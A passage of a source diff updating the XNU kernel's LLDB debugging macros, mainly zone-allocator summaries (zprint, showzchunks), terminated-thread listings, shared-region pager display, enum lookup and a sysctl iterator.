- params: - zone: value - obj representing a zone in kernel - returns: - str - summary of the zone's cache contents - """ - format_string = '{:#018x} {:>5d} {:>4d} / {:>4d} {:>12,d} {:>12,d} {:>9,d} {:>9,d} {:>9,d} {:>9,d} {:>9,d} {:<20s}' - mag_capacity = kern.GetGlobalVariable('magazine_element_count') - depot_capacity = kern.GetGlobalVariable('depot_element_count') - - cache_elem_count = 0 - allocs = 0 - frees = 0 - - if zone.__getattr__('cpu_cache_enabled') : - for cache in IterateZPerCPU(zone.zcache.zcc_pcpu, 'struct zcc_per_cpu_cache *'): - cache_elem_count += cache.current.zcc_magazine_index - cache_elem_count += cache.previous.zcc_magazine_index - allocs += cache.zcc_allocs - frees += cache.zcc_frees - - depot = zone.zcache.zcc_depot - cache_elem_count += depot.zcc_depot_index * mag_capacity - print O.format(format_string, zone, cache_elem_count, - depot.zcc_depot_index, depot_capacity - depot.zcc_depot_index, - allocs, frees, depot.zcc_swap, depot.zcc_fill, depot.zcc_drain, - depot.zcc_gc, depot.zcc_fail, ZoneName(zone)) - -@lldb_command('showzcache', fancy=True) -def ZcachePrint(cmd_args=None, cmd_options={}, O=None): - """ Routine to print a summary listing of all the kernel zones cache contents - All columns are printed in decimal - """ - global kern - with O.table(GetZoneCacheSummary.header): - for zval in kern.zones: - if zval.__getattr__('cpu_cache_enabled') : - GetZoneCacheSummary(zval, O) - -# EndMacro: showzcache - -# Macro: showzcachecpu - -@lldb_type_summary(['zone','zone_t']) -@header("{:18s} {:32s} {:<10s} {:<10s}".format( -'ZONE', 'NAME', 'CACHE_ELTS', 'CPU_INFO')) - -def GetZoneCacheCPUSummary(zone, O): +@header("{:18s} {:32s} {:>6s} {:>6s} {:>6s} {:>6s} {:>6s} {:>6s} {:11s} {:>11s} {:>11s} {:>8s} {:>7s} {:>7s} {:>6s} {:>6s} {:>8s} {:>6s} {:>5s} {:>7s} {:<18s} {:<20s}").format( +@header(("{:<18s} {:_^47s} {:_^24s} {:_^13s} {:_^28s}\n"+ +"{:<18s} {:>11s} {:>11s} {:>11s} {:>11s} {:>8s} {:>7s} {:>7s} {:>6s} {:>6s} {:>8s} {:>6s} {:>5s} {:>7s} 
{:<18s} {:<20s}").format( '', 'SIZE (bytes)', 'ELEMENTS (#)', 'PAGES', 'ALLOC CHUNK CONFIG', -'ZONE', 'TOTAL', 'ALLOC', 'FREE', 'ALLOC', 'FREE', 'CACHE', 'COUNT', 'FREE', 'SIZE (P)', 'ELTS', 'WASTE', 'ELT_SZ', 'FLAGS', 'NAME')) +'ZONE', 'TOTAL', 'ALLOC', 'CACHE', 'FREE', 'ALLOC', 'CACHE', 'FREE', 'COUNT', 'FREE', 'SIZE (P)', 'ELTS', 'WASTE', 'ELT_SZ', 'FLAGS', 'NAME')) def GetZoneSummary(zone_val, marks, stats): """ Summarize a zone with important information. See help zprint for description of each field params: @@ -590,16 +661,21 @@ def GetZoneSummary(zone_val, marks, stats): out_string = "" zone = GetZone(zone_val, marks) - format_string = '{zone:#018x} {cur_size:11,d} {used_size:11,d} {free_size:11,d} ' - format_string += '{count_elts:8,d} {zone.countfree:7,d} {cache_elem_count:7,d} ' - format_string += '{zone.page_count:6,d} {zone.allfree_page_count:6,d} ' - format_string += '{alloc_size_kb:3,d}K ({zone.alloc_pages:d}) {alloc_count:6,d} {alloc_waste:5,d} {zone.pcpu_elem_size:7,d} ' + pcpu_scale = 1 + if zone_val.z_percpu: + pcpu_scale = unsigned(kern.globals.zpercpu_early_count) + + format_string = '{zone:#018x} {zd[size]:11,d} {zd[used_size]:11,d} {zd[cached_size]:11,d} {zd[free_size]:11,d} ' + format_string += '{zd[element_count]:8,d} {zd[cache_element_count]:7,d} {zone.z_elems_free:7,d} ' + format_string += '{z_wired_cur:6,d} {z_wired_empty:6,d} ' + format_string += '{alloc_size_kb:3,d}K ({zone.z_chunk_pages:d}) ' + format_string += '{zd[allocation_count]:6,d} {zd[allocation_waste]:5,d} {z_elem_size:7,d} ' format_string += '{markings:<18s} {zone_name:<20s}' markings="" if zone["destroyed"]: markings+="I" - + for mark in marks: if zone[mark[0]]: markings += mark[1] @@ -607,10 +683,11 @@ def GetZoneSummary(zone_val, marks, stats): markings+=" " alloc_size_kb = zone["allocation_size"] / 1024 - out_string += format_string.format(zone=zone_val, free_size=zone["free_size"], used_size=zone["used_size"], - cur_size=zone["size"], count_elts=zone["element_count"], 
cache_elem_count=zone["cache_element_count"], - alloc_count=zone["allocation_count"], alloc_size_kb=alloc_size_kb, alloc_waste=zone["allocation_waste"], - markings=markings, zone_name=zone["name"]) + out_string += format_string.format(zone=zone_val, zd=zone, + z_wired_cur=unsigned(zone_val.z_wired_cur) * pcpu_scale, + z_wired_empty=unsigned(zone_val.z_wired_empty) * pcpu_scale, + z_elem_size=unsigned(zone_val.z_elem_size) * pcpu_scale, + alloc_size_kb=alloc_size_kb, markings=markings, zone_name=zone["name"]) if zone["exhaustible"] : out_string += " (max: {:d})".format(zone["page_count_max"] * pagesize) @@ -620,6 +697,7 @@ def GetZoneSummary(zone_val, marks, stats): stats["cur_size"] += zone["size"] stats["used_size"] += zone["used_size"] + stats["cached_size"] += zone["cached_size"] stats["free_size"] += zone["free_size"] stats["cur_pages"] += zone["page_count"] stats["free_pages"] += zone["allfree_page_count"] @@ -634,46 +712,50 @@ def Zprint(cmd_args=None, cmd_options={}, O=None): Output json All columns are printed in decimal Legend: + ! 
- zone uses VA sequestering + $ - not encrypted during hibernation + A - currently trying to allocate more backing memory from kernel_memory_allocate without VM priv C - collectable D - destructible - X - expandable - $ - not encrypted during hibernation - H - exhaustible + E - Per-cpu caching is enabled for this zone F - allows foreign memory (memory not allocated from any zone map) + G - currently running GC + H - exhaustible + I - zone was destroyed and is no longer valid + L - zone is being monitored by zleaks M - gzalloc will avoid monitoring this zone - R - will be refilled when below low water mark - O - does not allow refill callout to fill zone on noblock allocation N - zone requires alignment (avoids padding this zone for debugging) - A - currently trying to allocate more backing memory from kernel_memory_allocate without VM priv + O - does not allow refill callout to fill zone on noblock allocation + R - will be refilled when below low water mark S - currently trying to allocate more backing memory from kernel_memory_allocate with VM priv W - another thread is waiting for more memory - E - Per-cpu caching is enabled for this zone - L - zone is being monitored by zleaks - G - currently running GC - I - zone was destroyed and is no longer valid + X - expandable + Z - elements are zeroed on free """ global kern marks = [ ["collectable", "C"], - ["destructible", "D"], + ["z_destructible", "D"], ["expandable", "X"], - ["noencrypt", "$"], + ["z_noencrypt", "$"], ["exhaustible", "H"], - ["allows_foreign", "F"], - ["prio_refill_count", "R"], + ["z_allows_foreign", "F"], + ["z_elems_rsv", "R"], ["no_callout", "O"], ["zleak_on", "L"], - ["expanding_no_vm_priv", "A"], - ["expanding_vm_priv", "S"], - ["waiting", "W"], - ["cpu_cache_enabled", "E"], + ["z_expander", "A"], + ["z_expander_vm_priv", "S"], + ["z_replenish_wait", "W"], + ["z_pcpu_cache", "E"], ["gzalloc_exempt", "M"], ["alignment_required", "N"], - ["va_sequester", "!"] + ["z_va_sequester", "!"], + 
["z_free_zeroes", "Z"] ] + stats = { - "cur_size": 0, "used_size": 0, "free_size": 0, + "cur_size": 0, "used_size": 0, "cached_size": 0, "free_size": 0, "cur_pages": 0, "free_pages": 0, "seq_pages": 0 } @@ -694,7 +776,7 @@ def Zprint(cmd_args=None, cmd_options={}, O=None): if zval.z_self: print GetZoneSummary(zval, marks, stats) - format_string = '{VT.Bold}{name:19s} {stats[cur_size]:11,d} {stats[used_size]:11,d} {stats[free_size]:11,d} ' + format_string = '{VT.Bold}{name:19s} {stats[cur_size]:11,d} {stats[used_size]:11,d} {stats[cached_size]:11,d} {stats[free_size]:11,d} ' format_string += ' ' format_string += '{stats[cur_pages]:6,d} {stats[free_pages]:6,d}{VT.EndBold} ' format_string += '(sequester: {VT.Bold}{stats[seq_pages]:,d}{VT.EndBold})' @@ -721,61 +803,7 @@ def TestZprint(kernel_target, config, lldb_obj, isConnected ): # EndMacro: zprint - -# Macro: showzfreelist - -def ShowZfreeListHeader(zone): - """ Helper routine to print a header for zone freelist. - (Since the freelist does not have a custom type, this is not defined as a Type Summary). 
- params: - zone:zone_t - Zone object to print header info - returns: - None - """ - - scaled_factor = (unsigned(kern.globals.zp_factor) + - (unsigned(zone.z_elem_size) >> unsigned(kern.globals.zp_scale))) - - out_str = "" - out_str += "{0: <9s} {1: <12s} {2: <18s} {3: <18s} {4: <6s}\n".format('ELEM_SIZE', 'COUNT', 'NCOOKIE', 'PCOOKIE', 'FACTOR') - out_str += "{0: <9d} {1: <12d} 0x{2:0>16x} 0x{3:0>16x} {4: <2d}/{5: <2d}\n\n".format( - zone.z_elem_size, zone.countavail - zone.countfree, kern.globals.zp_nopoison_cookie, kern.globals.zp_poisoned_cookie, zone.zp_count, scaled_factor) - out_str += "{0: <7s} {1: <18s} {2: <18s} {3: <18s} {4: <18s} {5: <18s} {6: <14s}\n".format( - 'NUM', 'ELEM', 'NEXT', 'BACKUP', '^ NCOOKIE', '^ PCOOKIE', 'POISON (PREV)') - print out_str - -def ShowZfreeListChain(zone, zfirst, zlimit): - """ Helper routine to print a zone free list chain - params: - zone: zone_t - Zone object - zfirst: void * - A pointer to the first element of the free list chain - zlimit: int - Limit for the number of elements to be printed by showzfreelist - returns: - None - """ - current = Cast(zfirst, 'void *') - while ShowZfreeList.elts_found < zlimit: - ShowZfreeList.elts_found += 1 - znext = dereference(Cast(current, 'vm_offset_t *')) - znext = (unsigned(znext) ^ unsigned(kern.globals.zp_nopoison_cookie)) - znext = kern.GetValueFromAddress(znext, 'vm_offset_t *') - backup_ptr = kern.GetValueFromAddress((unsigned(Cast(current, 'vm_offset_t')) + unsigned(zone.z_elem_size) - sizeof('vm_offset_t')), 'vm_offset_t *') - backup_val = dereference(backup_ptr) - n_unobfuscated = (unsigned(backup_val) ^ unsigned(kern.globals.zp_nopoison_cookie)) - p_unobfuscated = (unsigned(backup_val) ^ unsigned(kern.globals.zp_poisoned_cookie)) - poison_str = '' - if p_unobfuscated == unsigned(znext): - poison_str = "P ({0: 16x} 0x{2:0>16x} 0x{3:0>16x} 0x{4:0>16x} 0x{5:0>16x} {6: <14s}\n".format( - ShowZfreeList.elts_found, unsigned(current), unsigned(znext), - unsigned(backup_val), 
n_unobfuscated, p_unobfuscated, poison_str) - if unsigned(znext) == 0: - break - current = Cast(znext, 'void *') +# Macro: showzchunks def ZoneIteratePageQueue(page): while page.packed_address: @@ -783,42 +811,108 @@ def ZoneIteratePageQueue(page): yield meta page = meta.meta.zm_page_next -@static_var('elts_found',0) -@static_var('last_poisoned',0) -@lldb_command('showzfreelist') -def ShowZfreeList(cmd_args=None): - """ Walk the freelist for a zone, printing out the primary and backup next pointers, the poisoning cookies, and the poisoning status of each element. - Usage: showzfreelist [iterations] +@header("{: <20s} {: <20s} {: <20s} {: <25s} {: <10s} {: <8s} {: <4s} {: >9s}".format( + "Zone", "Metadata", "Page", "Bitmap", "Kind", "Queue", "Pgs", "Allocs")) +def GetZoneChunk(meta, queue, O=None): + format_string = "{meta.zone: <#20x} " + format_string += "{meta.meta_addr: <#20x} {meta.page_addr: <#20x} " + format_string += "{bitmap: <#18x} @{bitmap_size:<5d} " + format_string += "{kind:<10s} {queue:<8s} {pgs:<1d}/{chunk:<1d} " + format_string += "{alloc_count: >4d}/{avail_count: >4d}" + + pgs = int(meta.zone.z_chunk_pages) + chunk = pgs + if meta.meta.zm_chunk_len >= 0xe: + kind = "secondary" + pgs -= int(meta.meta.zm_page_index) + else: + kind = "primary" + + alloc_count=meta.getAllocCount() + avail_count=meta.getAllocAvail() + free_count=meta.getFreeCountSlow() + + if alloc_count + free_count != avail_count: + format_string += " {VT.Red}bitmap mismatch{VT.Default}" + + return O.format(format_string, meta=meta, + alloc_count=alloc_count, + avail_count=avail_count, + bitmap=meta.getBitmap(), + bitmap_size=meta.getBitmapSize(), + queue=queue, kind=kind, pgs=pgs, chunk=chunk) + +def ShowZChunksImpl(zone, extra_addr=None, cmd_options={}, O=None): + verbose = '-V' in cmd_options + + def do_content(meta, O, indent=False): + with O.table("{:>5s} {:<20s} {:<10s}".format("#", "Element", "State"), indent=indent): + i = 0 + for e in meta.iterateElements(): + status = 
"Allocated" + if meta.isElementFree(e): + status = "Free" + print O.format("{:5d} {:<#20x} {:10s}", i, e, status) + i += 1 + + if extra_addr is None: + with O.table(GetZoneChunk.header): + for meta in ZoneIteratePageQueue(zone.z_pageq_full): + print GetZoneChunk(meta, "full", O) + if verbose: do_content(meta, O, indent=True); + + for meta in ZoneIteratePageQueue(zone.z_pageq_partial): + print GetZoneChunk(meta, "partial", O) + if verbose: do_content(meta, O, indent=True); + + for meta in ZoneIteratePageQueue(zone.z_pageq_empty): + print GetZoneChunk(meta, "empty", O) + if verbose: do_content(meta, O, indent=True); + + for meta in ZoneIteratePageQueue(zone.z_pageq_va): + print GetZoneChunk(meta, "va", O) + else: + meta = ZoneMeta(extra_addr, isPageIndex="-I" in cmd_options).getReal() + with O.table(GetZoneChunk.header): + print GetZoneChunk(meta, "N/A", O) + do_content(meta, O) + +@lldb_command('showzchunks', "IV", fancy=True) +def ShowZChunks(cmd_args=None, cmd_options={}, O=None): + """ + prints the list of zone chunks, or the content of a given chunk + + Usage: showzchunks [-I] [-V] [address] + + Use -I to interpret [address] as a page index + Use -V to show the contents of all the chunks - Will walk up to 50 elements by default, pass a limit in 'iterations' to override. 
+ [address] can by any address belonging to the zone, or metadata """ + if not cmd_args: - print ShowZfreeList.__doc__ - return - ShowZfreeList.elts_found = 0 - ShowZfreeList.last_poisoned = 0 + return O.error('missing zone argument') zone = kern.GetValueFromAddress(cmd_args[0], 'struct zone *') - zlimit = 50 - if len(cmd_args) >= 2: - zlimit = ArgumentStringToInt(cmd_args[1]) - ShowZfreeListHeader(zone) - for head in [zone.pages_any_free_foreign, zone.pages_intermediate, zone.pages_all_free]: - for free_page_meta in ZoneIteratePageQueue(head): - if ShowZfreeList.elts_found == zlimit: - break - zfirst = free_page_meta.getFreeList() - if zfirst != 0: - ShowZfreeListChain(zone, zfirst, zlimit) - - if ShowZfreeList.elts_found == zlimit: - print "Stopped at {0: 7s} {:>7s} {:>7s} {:<50s}".format("tag.kmod", "peak", "size", "mapped", "name") + print " {:<7s} {:>7s} {:>7s} {:<50s}".format("tag.kmod", "size", "mapped", "name") for tag in tags: if not tagstr: tagstr = "" - print " {:>3d}{:<4s} {:>7d}K {:>7d}K {:>7d}K {:<50s}".format(tag["tag"], tag["tagstr"], tag["peak"] / 1024, tag["size"] / 1024, tag["mapped"] / 1024, tag["name"]) + print " {:>3d}{:<4s} {:>7d}K {:>7d}K {:<50s}".format(tag["tag"], tag["tagstr"], tag["size"] / 1024, tag["mapped"] / 1024, tag["name"]) for sub in tag["subtotals"]: if ((sub["flags"] & 0x007f) == 0): kind_str = "named" else: kind_str = "from" - print " {:>7s} {:>7s} {:>7s} {:>7d}K {:s} {:>3d}{:<4s} {:<50s}".format(" ", " ", " ", sub["amount"] / 1024, kind_str, sub["tag"], sub["tagstr"], sub["sitestr"]) + print " {:>7s} {:>7d}K {:s} {:>3d}{:<4s} {:<50s}".format(" ", sub["amount"] / 1024, kind_str, sub["tag"], sub["tagstr"], sub["sitestr"]) - print "Total: {:>7d}K {:>7d}K".format(total / 1024, totalmapped / 1024) + print "Total: {:>7d}K {:>7d}K".format(total / 1024, totalmapped / 1024) return None @@ -3759,22 +3856,14 @@ def ShowAllocatedElementsInZone(cmd_args=None, cmd_options={}): def FindAllocatedElementsInZone(zone): elements = [] - if not 
zone.z_self or zone.permanent: + if not zone.z_self or zone.z_permanent: return elements - for head in [zone.pages_any_free_foreign, zone.pages_all_used_foreign, - zone.pages_intermediate, zone.pages_all_used]: - + for head in [zone.z_pageq_partial, zone.z_pageq_full]: for meta in ZoneIteratePageQueue(head): - free_elements = set(meta.iterateFreeList()) - for elem in meta.iterateElements(): - if elem in free_elements: - continue - - if elem not in free_elements: + if not meta.isElementFree(elem): elements.append(elem) - elem += zone.z_elem_size return elements @@ -4145,7 +4234,7 @@ def ShowAllAppleProtectPagers(cmd_args=None): """Routine to print all apple_protect pagers usage: show_all_apple_protect_pagers """ - print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "mo_control", "object", "offset", "crypto_offset", "crypto_start", "crypto_end") + print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "cached", "object", "offset", "crypto_offset", "crypto_start", "crypto_end") qhead = kern.globals.apple_protect_pager_queue qtype = GetType('apple_protect_pager *') qcnt = kern.globals.apple_protect_pager_count @@ -4173,7 +4262,56 @@ def show_apple_protect_pager(pager, qcnt, idx): shadow = object.shadow vnode_pager = Cast(object.pager,'vnode_pager *') filename = GetVnodePath(vnode_pager.vnode_handle) - print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {: <#018x} {: <#018x} {:#018x} {:#018x} {:#018x} {:#018x}\n\tcrypt_info:{: <#018x} \n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, pager.ref_count, pager.is_ready, pager.is_mapped, pager.pager_control, pager.backing_object, pager.backing_offset, pager.crypto_backing_offset, pager.crypto_start, pager.crypto_end, pager.crypt_info, pager.crypt_info.page_decrypt, pager.crypt_info.crypt_end, pager.crypt_info.crypt_ops, 
pager.crypt_info.crypt_refcnt, vnode_pager.vnode_handle, filename) + if hasattr(pager, "ap_pgr_hdr_ref"): + refcnt = pager.ap_pgr_hdr_ref + else: + refcnt = pager.ap_pgr_hdr.mo_ref + print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {:>6d} {: <#018x} {:#018x} {:#018x} {:#018x} {:#018x}\n\tcrypt_info:{: <#018x} \n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, refcnt, pager.is_ready, pager.is_mapped, pager.is_cached, pager.backing_object, pager.backing_offset, pager.crypto_backing_offset, pager.crypto_start, pager.crypto_end, pager.crypt_info, pager.crypt_info.page_decrypt, pager.crypt_info.crypt_end, pager.crypt_info.crypt_ops, pager.crypt_info.crypt_refcnt, vnode_pager.vnode_handle, filename) + showvmobject(pager.backing_object, pager.backing_offset, pager.crypto_end - pager.crypto_start, 1, 1) + +@lldb_command("show_all_shared_region_pagers") +def ShowAllSharedRegionPagers(cmd_args=None): + """Routine to print all shared_region pagers + usage: show_all_shared_region_pagers + """ + print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "object", "offset", "jop_key", "slide", "slide_info") + qhead = kern.globals.shared_region_pager_queue + qtype = GetType('shared_region_pager *') + qcnt = kern.globals.shared_region_pager_count + idx = 0 + for pager in IterateQueue(qhead, qtype, "srp_queue"): + idx = idx + 1 + show_shared_region_pager(pager, qcnt, idx) + +@lldb_command("show_shared_region_pager") +def ShowSharedRegionPager(cmd_args=None): + """Routine to print out info about a shared_region pager + usage: show_shared_region_pager + """ + if cmd_args == None or len(cmd_args) < 1: + print "Invalid argument.", ShowSharedRegionPager.__doc__ + return + pager = kern.GetValueFromAddress(cmd_args[0], 'shared_region_pager_t') + show_shared_region_pager(pager, 1, 1) + +def show_shared_region_pager(pager, qcnt, idx): + object = pager.srp_backing_object + shadow = object.shadow + while 
shadow != 0: + object = shadow + shadow = object.shadow + vnode_pager = Cast(object.pager,'vnode_pager *') + filename = GetVnodePath(vnode_pager.vnode_handle) + if hasattr(pager, 'srp_ref_count'): + ref_count = pager.srp_ref_count + else: + ref_count = pager.srp_header.mo_ref + if hasattr(pager, 'srp_jop_key'): + jop_key = pager.srp_jop_key + else: + jop_key = -1 + print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {: <#018x} {:#018x} {:#018x} {:#018x}\n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, ref_count, pager.srp_is_ready, pager.srp_is_mapped, pager.srp_backing_object, pager.srp_backing_offset, jop_key, pager.srp_slide_info.si_slide, pager.srp_slide_info, vnode_pager.vnode_handle, filename) + showvmobject(pager.srp_backing_object, pager.srp_backing_offset, pager.srp_slide_info.si_end - pager.srp_slide_info.si_start, 1, 1) @lldb_command("show_console_ring") def ShowConsoleRingData(cmd_args=None): @@ -4545,36 +4683,6 @@ def vm_page_lookup_in_compressor(slot_ptr): else: print "" -def print_hex_data(data, begin_offset=0, desc=""): - """ print on stdout "hexdump -C < data" like output - params: - data - bytearray or array of int where each int < 255 - begin_offset - int offset that should be printed in left column - desc - str optional description to print on the first line to describe data - """ - if desc: - print "{}:".format(desc) - index = 0 - total_len = len(data) - hex_buf = "" - char_buf = "" - while index < total_len: - hex_buf += " {:02x}".format(data[index]) - if data[index] < 0x20 or data[index] > 0x7e: - char_buf += "." 
- else: - char_buf += "{:c}".format(data[index]) - index += 1 - if index and index % 8 == 0: - hex_buf += " " - if index > 1 and (index % 16) == 0: - print "{:08x} {: <50s} |{: <16s}|".format(begin_offset + index - 16, hex_buf, char_buf) - hex_buf = "" - char_buf = "" - if index % 16 != 0: - print "{:08x} {: <50s} |{: <16s}|".format(begin_offset + index - 16, hex_buf, char_buf) - return - @lldb_command('vm_scan_all_pages') def VMScanAllPages(cmd_args=None): """Scans the vm_pages[] array diff --git a/tools/lldbmacros/process.py b/tools/lldbmacros/process.py index c7d5f493c..6bab4e27c 100755 --- a/tools/lldbmacros/process.py +++ b/tools/lldbmacros/process.py @@ -11,6 +11,7 @@ import time import xnudefines import memory import json +from collections import defaultdict def GetProcName(proc): """ returns a string name of the process. Longer variant is preffered if provided. @@ -26,17 +27,25 @@ def GetProcName(proc): return str(proc.p_comm) def GetProcNameForTask(task): - """ returns a string name of the process. if proc is not valid "unknown" is returned + """ returns a string name of the process. If proc is not valid the proc + name is looked up in the associated importance structure (if + available). If no name can be found, "unknown" is returned. params: task: value object represeting a task in the kernel. returns: str : A string name of the process linked to the task """ - if not task or not unsigned(task.bsd_info): - return "unknown" - p = Cast(task.bsd_info, 'proc *') + if task: + if unsigned(task.bsd_info): + p = Cast(task.bsd_info, 'proc *') + return GetProcName(p) + + if (hasattr(task, 'task_imp_base') and + hasattr(task.task_imp_base, 'iit_procname') and + unsigned(task.task_imp_base) != 0): + return str(task.task_imp_base.iit_procname) - return GetProcName(p) + return "unknown" def GetProcPIDForTask(task): """ returns a int pid of the process. if the proc is not valid, val[5] from audit_token is returned. 
@@ -187,6 +196,7 @@ def GetASTSummary(ast): K - AST_KPERF M - AST_MACF r - AST_RESET_PCS + a - AST_ARCADE G - AST_GUARD T - AST_TELEMETRY_USER T - AST_TELEMETRY_KERNEL @@ -201,12 +211,12 @@ def GetASTSummary(ast): out_string = "" state = int(ast) thread_state_chars = {0x0:'', 0x1:'P', 0x2:'Q', 0x4:'U', 0x8:'H', 0x10:'Y', 0x20:'A', - 0x40:'L', 0x80:'B', 0x100:'K', 0x200:'M', 0x400: 'r', + 0x40:'L', 0x80:'B', 0x100:'K', 0x200:'M', 0x400: 'r', 0x800: 'a', 0x1000:'G', 0x2000:'T', 0x4000:'T', 0x8000:'T', 0x10000:'S', 0x20000: 'D', 0x40000: 'I', 0x80000: 'E', 0x100000: 'R', 0x200000: 'N'} state_str = '' mask = 0x1 - while mask <= 0x80000: + while mask <= 0x200000: state_str += thread_state_chars[int(state & mask)] mask = mask << 1 @@ -583,7 +593,7 @@ def GetThreadGroupSummary(tg): tg_flags += 'E' if (tg.tg_flags & 0x2): tg_flags += 'U' - out_string += format_string.format(tg, tg.tg_id, tg.tg_name, tg.tg_refcount, tg_flags, tg.tg_recommendation) + out_string += format_string.format(tg, tg.tg_id, tg.tg_name, tg.tg_refcount.ref_count, tg_flags, tg.tg_recommendation) return out_string @lldb_command('showallthreadgroups') @@ -1052,8 +1062,20 @@ def ShowTerminatedTasks(cmd_args=None): global kern print GetTaskSummary.header + " " + GetProcSummary.header for t in kern.terminated_tasks: + + # If the task has been terminated it's likely that the process is + # gone too. If there is no proc it may still be possible to find + # the original proc name. pval = Cast(t.bsd_info, 'proc *') - print GetTaskSummary(t) +" "+ GetProcSummary(pval) + if pval: + psummary = GetProcSummary(pval) + else: + name = GetProcNameForTask(t); + pslen = GetProcSummary.header.find("command"); + psummary = "{0: <{indent}} {1: [thread, ..] 
map of terminated threads + tmap = defaultdict(list) + for thr in kern.terminated_threads: + tmap[unsigned(thr.task)].append(thr) + for t in kern.tasks: ShowTaskThreads([str(int(t))]) + ShowTaskTerminatedThreads(t) print " \n" - + for t in kern.terminated_tasks: print "Terminated: \n" ShowTaskThreads([str(int(t))]) + ShowTaskTerminatedThreads(t) print " \n" - + + return + +@lldb_command('showterminatedthreads') +def ShowTerminatedThreads(cmd_args=None): + """ Display info about all terminated threads in the system + """ + + global kern + print GetThreadSummary.header + for t in kern.terminated_threads: + print GetThreadSummary(t) + return @lldb_command('showtaskthreads', "F:") @@ -1346,7 +1394,7 @@ def GetFullBackTrace(frame_addr, verbosity = vHUMAN, prefix = ""): if (not kern.arch.startswith('arm') and frame_ptr < mh_execute_addr) or (kern.arch.startswith('arm') and frame_ptr > mh_execute_addr): break pc_val = kern.GetValueFromAddress(frame_ptr + kern.ptrsize,'uintptr_t *') - pc_val = unsigned(dereference(pc_val)) + pc_val = kern.StripKernelPAC(unsigned(dereference(pc_val))) out_string += prefix + GetSourceInformationForAddress(pc_val) + "\n" bt_count +=1 previous_frame_ptr = frame_ptr diff --git a/tools/lldbmacros/utils.py b/tools/lldbmacros/utils.py index 6039f2048..b726867d5 100755 --- a/tools/lldbmacros/utils.py +++ b/tools/lldbmacros/utils.py @@ -305,25 +305,38 @@ def WriteInt8ToMemoryAddress(intval, addr): return False _enum_cache = {} -def GetEnumValue(name): +def GetEnumValue(enum_name_or_combined, member_name = None): """ Finds the value of a particular enum define. Ex kdp_req_t::KDP_VERSION => 0x3 params: - name : str - name of enum in the format type::name + enum_name_or_combined: str + name of an enum of the format type::name (legacy) + name of an enum type + member_name: None, or the name of an enum member + (then enum_name_or_combined is a type name). returns: int - value of the particular enum. 
raises: TypeError - if the enum is not found """ - name = name.strip() global _enum_cache - if name not in _enum_cache: - res = lldb.SBCommandReturnObject() - lldb.debugger.GetCommandInterpreter().HandleCommand("p/x (`%s`)" % name, res) - if not res.Succeeded(): - raise TypeError("Enum not found with name: " + name) - # the result is of format '(int) $481 = 0x00000003\n' - _enum_cache[name] = int( res.GetOutput().split('=')[-1].strip(), 16) - return _enum_cache[name] + if member_name is None: + enum_name, member_name = enum_name_or_combined.strip().split("::") + else: + enum_name = enum_name_or_combined + + if enum_name not in _enum_cache: + ty = GetType(enum_name) + d = {} + + for e in ty.get_enum_members_array(): + if ty.GetTypeFlags() & lldb.eTypeIsSigned: + d[e.GetName()] = e.GetValueAsSigned() + else: + d[e.GetName()] = e.GetValueAsUnsigned() + + _enum_cache[enum_name] = d + + return _enum_cache[enum_name][member_name] def ResolveFSPath(path): """ expand ~user directories and return absolute path. @@ -442,12 +455,13 @@ def IsAppleInternal(): retval = False return retval -def print_hex_data(data, begin_offset=0, desc=""): +def print_hex_data(data, begin_offset=0, desc="", marks={}): """ print on stdout "hexdump -C < data" like output params: data - bytearray or array of int where each int < 255 begin_offset - int offset that should be printed in left column desc - str optional description to print on the first line to describe data + mark - dictionary of markers """ if desc: print "{}:".format(desc) @@ -456,7 +470,11 @@ def print_hex_data(data, begin_offset=0, desc=""): hex_buf = "" char_buf = "" while index < total_len: - hex_buf += " {:02x}".format(data[index]) + if marks.has_key(begin_offset + index): + hex_buf += marks[begin_offset + index] + hex_buf += "{:02x}".format(data[index]) + else: + hex_buf += " {:02x}".format(data[index]) if data[index] < 0x20 or data[index] > 0x7e: char_buf += "." 
else: diff --git a/tools/lldbmacros/xnu.py b/tools/lldbmacros/xnu.py index d935362ab..ce5997b5e 100755 --- a/tools/lldbmacros/xnu.py +++ b/tools/lldbmacros/xnu.py @@ -284,7 +284,7 @@ def GetObjectAtIndexFromArray(array_base, index): base_address = array_base_val.GetValueAsUnsigned() size = array_base_val.GetType().GetPointeeType().GetByteSize() obj_address = base_address + (index * size) - obj = kern.GetValueFromAddress(obj_address, array_base_val.GetType().GetName()) + obj = kern.GetValueFromAddress(obj_address, array_base_val.GetType()) return Cast(obj, array_base_val.GetType()) @@ -1169,7 +1169,35 @@ def TrapTrace_cmd(cmd_args=[], cmd_options={}): Trace_cmd(cmd_args, cmd_options, hdrString, entryString, kern.globals.traptrace_ring, kern.globals.traptrace_entries_per_cpu, MAX_TRAPTRACE_BACKTRACES) - + +# Yields an iterator over all the sysctls from the provided root. +# Can optionally filter by the given prefix +def IterateSysctls(root_oid=kern.globals.sysctl__children, prefix="", depth = 0, parent = ""): + headp = root_oid + for pp in IterateListEntry(headp, 'struct sysctl_oid *', 'oid_link', 's'): + node_str = "" + if prefix != "": + node_str = str(pp.oid_name) + if parent != "": + node_str = parent + "." + node_str + if node_str.startswith(prefix): + yield pp, depth, parent + else: + yield pp, depth, parent + type = pp.oid_kind & 0xf + if type == 1 and pp.oid_arg1 != 0: + if node_str == "": + next_parent = str(pp.oid_name) + if parent != "": + next_parent = parent + "." + next_parent + else: + next_parent = node_str + # Only recurse if the next parent starts with our allowed prefix. + # Note that it's OK if the parent string is too short (because the prefix might be for a deeper node). 
